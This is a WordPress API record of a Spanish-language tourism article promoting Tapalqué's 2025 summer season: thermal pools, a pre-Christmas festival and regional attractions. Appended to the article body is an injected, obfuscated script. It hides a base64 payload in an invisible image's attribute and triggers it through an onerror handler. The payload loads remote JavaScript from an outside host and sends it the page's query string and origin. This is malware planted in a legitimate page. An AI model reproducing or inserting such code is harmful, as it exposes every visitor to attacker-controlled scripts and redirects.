{"id":9064,"date":"2024-12-18T09:52:54","date_gmt":"2024-12-18T12:52:54","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9064"},"modified":"2025-08-13T15:34:25","modified_gmt":"2025-08-13T18:34:25","slug":"tapeque-apertura-de-temporada-con-termas-piscinas-y-fiestas-en-el-corazon-de-la-provincia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9064","title":{"rendered":"Tapequ\u00e9: Apertura de temporada con termas, piscinas y fiestas en el coraz\u00f3n de la Provincia"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-48d77c7b598a9857e967109d5a663046\" style=\"background-color:#036daf\"><em>A solo 270 kil\u00f3metros de la Capital Federal, Tapalqu\u00e9 inaugura su Temporada de Verano 2025 con una propuesta que combina relax, diversi\u00f3n y cultura. Desde sus reconocidas piscinas termales hasta la Fiesta Pre-Navide\u00f1a y una variada agenda de espect\u00e1culos y festivales, este destino se posiciona como el lugar ideal para escapar del calor y disfrutar de un entorno \u00fanico en la provincia de Buenos Aires.<\/em><\/h5>\n\n\n\n<p>Tapalqu\u00e9 Enamora, como dice su slogan tradicional y por esa raz\u00f3n es que, cada vez m\u00e1s gente la que elije hacerse una escapada. Cuando el calor se hace sentir en la ciudad, basta con subirse al auto o tomarse una combi y llegar a este pueblo sencillo, sereno, donde las calles se visten de verdes y aromas y el extenso arroyo que le da su nombre fluye tranquilo entre las sombras del balneario. Un espacio donde las piscinas termales invitan, con sus minerales y beneficios para la salud, a recuperar las fuerzas para seguir transitando la vida cotidiana una vez que se regrese a casa.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"9065\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-1024x683.jpg\" alt=\"\" class=\"wp-image-9065\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571-800x534.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-_MG_0571.jpg 1507w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"9067\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-1024x576.jpg\" alt=\"\" class=\"wp-image-9067\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-1024x576.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-300x169.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-768x432.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-1536x864.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-2048x1152.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-696x392.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-1068x601.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-747x420.jpg 747w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-320x180.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-480x270.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-DJI_0101-800x450.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"9066\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-1024x683.jpg\" alt=\"\" class=\"wp-image-9066\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_9752.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Rompiendo con la tradici\u00f3n que suele recomendar visitar los pueblos entre abril y noviembre, este destino sorprende con una amplia oferta de actividades durante la temporada de verano. Este a\u00f1o, el gran atractivo son las piscinas de agua dulce al aire libre, ubicadas en el predio termal. Dise\u00f1adas especialmente para los m\u00e1s peque\u00f1os, estas piscinas combinan diversi\u00f3n, juegos y espacios abiertos para disfrutar plenamente del verano en cualquier momento del d\u00eda. Este lugar se posiciona como una opci\u00f3n ideal para las familias que buscan relajarse y aprovechar el aire libre en un entorno natural \u00fanico<\/p>\n\n\n\n<p>Tapalqu\u00e9 inaugura&nbsp; la Temporada de Verano 2025 con una \u201cFiesta Pre Navide\u00f1a\u201d en el Balneario Municipal. All\u00ed estar\u00e1n presentes un&nbsp; importante n\u00famero de artesanos, feriantes, food trucks, cervezas artesanales y&nbsp; juegos. No van a faltar los m\u00fasicos locales y de la zona, quienes animar\u00e1n las dos jornadas. El s\u00e1bado 21 cierra la consagrada agrupaci\u00f3n de m\u00fasica tropical Los Charros y el domingo 22 se realiza el gran cierre de la fiesta, con la m\u00fasica campera de Leo Etchemendy.<\/p>\n\n\n\n<p>La entrada es libre y gratuita y lo organiza la Municipalidad de Tapalqu\u00e9 en conjunto con la agrupaci\u00f3n feri_@rte Producciones.<\/p>\n\n\n\n<p>PREP\u00c1RATE PARA DISFRUTAR EL VERANO 2025 EN TAPALQU\u00c9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-1024x683.jpg\" alt=\"\" class=\"wp-image-9068\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/12\/Copia-de-IMG_1694.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>El Balneario de Tapalqu\u00e9 ofrece espect\u00e1culos art\u00edsticos culturales, variedad de propuestas recreativas para toda la familia, visitas guiadas, patio gastron\u00f3mico y patio de artesanos entre muchas cosas m\u00e1s durante todo el verano. Adem\u00e1s del arroyo, el&nbsp; predio del Balneario cuenta con natatorio abierto al p\u00fablico con entrada, fogones, hornos de barro, canchas de b\u00e1squet, v\u00f3ley y bochas.<\/p>\n\n\n\n<p>En el Camping Municipal se incluyen servicio de ba\u00f1o, duchas, luz el\u00e9ctrica, agua caliente, parrilla, fogones, piletas de lavado y vigilancia las 24 hs.<\/p>\n\n\n\n<p>Tras la Inauguraci\u00f3n de Temporada con \u201cFiesta pre-navide\u00f1a\u201d los d\u00edas 21 y 22 de diciembre, llega la imperdible XIII Fiesta de la Torta Negra los d\u00edas 11 y 12 de enero. Entre el 15 y 16 de febrero se organiza para los fan\u00e1ticos la &nbsp;Expo Cactus, que centraliza la oferta de cactus y sucuelentas m\u00e1s completas de la regi\u00f3n, &nbsp;para unas semanas m\u00e1s adelante dar lugar a la inventiva y la imaginaci\u00f3n con la puesta en marcha de los carnavales, los d\u00edas 1, 2 y 3 de marzo.<\/p>\n\n\n\n<p>Ubicado a 270 kil\u00f3metros de la Capital Federal, sobre la Ruta Provincial 51, Tapalqu\u00e9 decidi\u00f3 apostar y so\u00f1ar una vez m\u00e1s a lo grande y es por eso que su complejo termal de lujo lo termin\u00f3 de posicionar entre uno de los destinos m\u00e1s interesantes de la&nbsp;Provincia.<\/p>\n\n\n\n<p>Tapalqu\u00e9, que en mapuche significa lugar de ba\u00f1ados y totoras, es una ciudad tranquila, donde la paz, el aire puro y la calidez de la gente se enlazan con un entorno pampeano \u00fanico, entre la vera del arroyo y el verde de la llanura. El compromiso municipal para el desarrollo local est\u00e1 intr\u00ednsecamente vinculado al Turismo, por lo cual incluye tambi\u00e9n la puesta en valor del patrimonio tangible e intangible, natural, hist\u00f3rico, cultural, paisaj\u00edstico.<\/p>\n\n\n\n<p>El balneario con sus verdes arboledas, los diez kil\u00f3metros de natural Costanera, los caminos rurales que conectan con el verde de los campos, los cielos silenciosos y estrellados son algunos de sus atractivos naturales, que se combinan con edificios hist\u00f3ricos y culturales como el Museo y Centro Conservatorio Tapalqu\u00e9, un espacio cultural innovador d\u00f3nde se muestra una l\u00ednea hist\u00f3rica que contempla miradas y voces por mucho tiempo acalladas, como la de los pueblos aut\u00f3nomos y las mujeres pioneras de la historia bonaerense.<\/p>\n\n\n\n<p>Uno de los destinos tur\u00edsticos m\u00e1s interesantes dentro del partido de Tapalqu\u00e9 es&nbsp; la pulper\u00eda San Gervasio, que funciona como tal desde 1885 en las inmediaciones de la localidad de Campod\u00f3nico. A\u00fan conserva el piso de tierra y las antiguas rejas que separaban al bolichero de los parroquianos.&nbsp; Fue la posta de carretas, gauchos y soldados que transitaban por lo que en aquel tiempo eran las fronteras. Es una de las pocas pulper\u00edas del pa\u00eds que se conservan casi intactas.<\/p>\n\n\n\n<p>Si quisi\u00e9ramos conocer&nbsp; la forma de vida tradicional de los habitantes bonaerenses y deslumbrarnos con los hermosos paisajes que ofrece la inmensidad de la pampa h\u00fameda, se puede visitar el peque\u00f1o pueblo rural Crotto, localidad de 300 habitantes que encuentra a 31 kil\u00f3metros de Termas Tapalqu\u00e9, donde visitar el Museo Municipal Comunitario que funciona en la antigua Estaci\u00f3n del Ferrocarril del Sud, la \u201cesquina de los almacenes\u201d con la Vieja Fonda y el Almac\u00e9n de Ramos Generales y la Plaza Central donde se encuentra la estatua de La Mujer Campesina.<\/p>\n\n\n\n<p>Reservas a trav\u00e9s de la p\u00e1gina&nbsp;<a href=\"http:\/\/www.termastapalque.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">www.termastapalque.com.ar<\/a><\/p>\n\n\n\n<p>Fuente: @soysandrakan\u00a0\u00a0 @cristelacicare<\/p>\n<p>\u00a0<\/p>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>A solo 270 kil\u00f3metros de la Capital Federal, Tapalqu\u00e9 inaugura su Temporada de Verano 2025 con una propuesta que combina relax, diversi\u00f3n y cultura. Desde sus reconocidas piscinas termales hasta la Fiesta Pre-Navide\u00f1a y una variada agenda de espect\u00e1culos y festivales, este destino se posiciona como el lugar ideal para escapar del calor y disfrutar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9065,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,22],"tags":[],"class_list":["post-9064","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-buenos-aires","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9064","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9064"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9064\/revisions"}],"predecessor-version":[{"id":10018,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9064\/revisions\/10018"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9065"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9064"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9064"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}